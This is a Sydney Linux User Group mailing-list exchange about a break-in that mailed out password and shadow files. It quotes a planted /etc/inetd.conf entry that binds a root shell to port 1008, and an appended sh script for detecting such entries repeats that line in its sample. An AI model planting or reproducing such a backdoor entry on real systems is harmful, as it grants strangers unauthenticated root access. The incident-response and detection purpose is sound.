Hi,

This occurred to me as well last night - I think around 3am. Similarly, it
was discovered because the mail destination domain could not be found.
However, I think this is because somewhere in the process of getting in,
they broke my local named (it wasn't working in the morning) - that or
somewhere upstream someone hurt DNS - I was getting a lot of "Lame server"
errors. The email contained the output of ifconfig and the contents of
/etc/passwd and /etc/shadow.

The ISP I was on was Telstra Bigpond - if it's the same, maybe they were
scanning that range of addresses.

The other change I found was the following entry on the end of
/etc/inetd.conf:

    1008 stream tcp nowait root /bin/sh sh

which you may want to check for and remove/comment.
 
I am thinking it could have been the BIND exploit coming active, but not
sure (I haven't upgraded yet, and my listen-on clause was broken - now fixed
not to listen outside).

The fact that they edited /etc/inetd.conf and cat'd shadow indicates root
privileges. However, there doesn't seem to be any evidence of things inside
or other changes, so possibly a buffer overflow exploit type deal?

I run RH6.2 btw :)

The only services I had running out of inetd were ftp, telnet and auth
(first 2 are shut down until I get home to tighten things) - not portmap.

Makes you wonder if one should send an edited email with prepared IP and
ready a box to trace what happens :)

 - Simon

>Last night I experienced a security breach. I run a small lan with a
>ppp dial-up connection that is often left connected. It seems that at
>11pm an email containing the output of ifconfig and the contents of
>the passwd files was sent by root to [EMAIL PROTECTED] Luckily the mail
>was bounced by our ISP (thanks to the lan's domain name not being found
>by the ISP's DNS).
>Scouring the log files, the only evidence of this breach I can find
>is the log of the attempted mail send in /var/log/maillog and the following
>suspicious entry in /var/log/messages:
>
>Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
>getport(status): request from unauthorized host
>
>This is the only portmap log I've ever had.
>Has anyone come across something similar? I've no idea whether this is
>the result of a trojan, or whether someone managed to gain access to
>my machine (although if they did gain root access, why mail out a passwd
>file?). Any thoughts?
>
>Sean.

--
Simon Bowden
Tech Support, School of Economics, UNSW
3rd Year Computer Engineering Student, UNSW
Mobile: 0414 937 375
email: [EMAIL PROTECTED]
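The inetd.conf line Simon quotes is the kind of thing worth checking for on any box from that era. Below is an added example (not code from Simon, Sean or the list) of a small POSIX sh check that walks an inetd.conf in the classic seven-field format (service, socket type, protocol, wait/nowait, user, server program, arguments) and flags entries whose server program or first argument is a shell, or whose service field is a bare port number rather than a name from /etc/services. The sample inetd.conf contents are constructed for the example; the function name and the heuristics are this example's own.

```sh
#!/bin/sh
# Added example: flag inetd.conf entries that hand out a shell.
# Assumed format (classic inetd):
#   <service> <socktype> <proto> <wait|nowait> <user> <server_path> <args...>

# True when the basename of the given program looks like a shell.
is_shell() {
    case "${1##*/}" in
        sh|bash|csh|tcsh|ksh|zsh|dash|-sh|-bash) return 0 ;;
    esac
    return 1
}

# Print every suspicious, non-comment line of the given inetd.conf with a
# reason. Returns 0 when nothing is flagged, 1 when at least one line is.
inetd_suspicious() {
    file=$1
    found=0
    set -f                      # no glob expansion while word-splitting lines
    while IFS= read -r line; do
        case "$line" in
            ''|\#*) continue ;; # blank or comment
        esac
        set -- $line
        [ $# -ge 6 ] || continue
        svc=$1; user=$5; prog=$6; arg0=${7:-}
        reason=
        is_shell "$prog" && reason="server program is a shell"
        is_shell "$arg0" && reason="${reason:+$reason; }argument invokes a shell"
        case "$svc" in
            *[!0-9]*) ;;        # a service name, as expected
            *) reason="${reason:+$reason; }service field is a bare port number" ;;
        esac
        if [ -n "$reason" ]; then
            found=1
            printf '%s (runs as %s): %s\n' "$reason" "$user" "$line"
        fi
    done < "$file"
    set +f
    return $found
}

# Constructed sample: a few RH6.2-style entries plus the planted line.
SAMPLE_BAD=$(mktemp)
cat > "$SAMPLE_BAD" <<'EOF'
# /etc/inetd.conf (constructed sample)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
auth    stream  tcp     nowait  nobody  /usr/sbin/in.identd in.identd -l -e -o
1008 stream tcp nowait root /bin/sh sh
EOF

# Same file without the planted line, for comparison.
SAMPLE_CLEAN=$(mktemp)
grep -v '/bin/sh' "$SAMPLE_BAD" > "$SAMPLE_CLEAN"

if inetd_suspicious "$SAMPLE_BAD"; then
    echo "no suspicious inetd entries"
else
    echo "review the lines above, then remove or comment them and HUP inetd"
fi
```

On a real host the call is simply `inetd_suspicious /etc/inetd.conf`; the numeric-service heuristic is only that, so a legitimate entry using a port number would also be listed and needs a human eye.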

-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug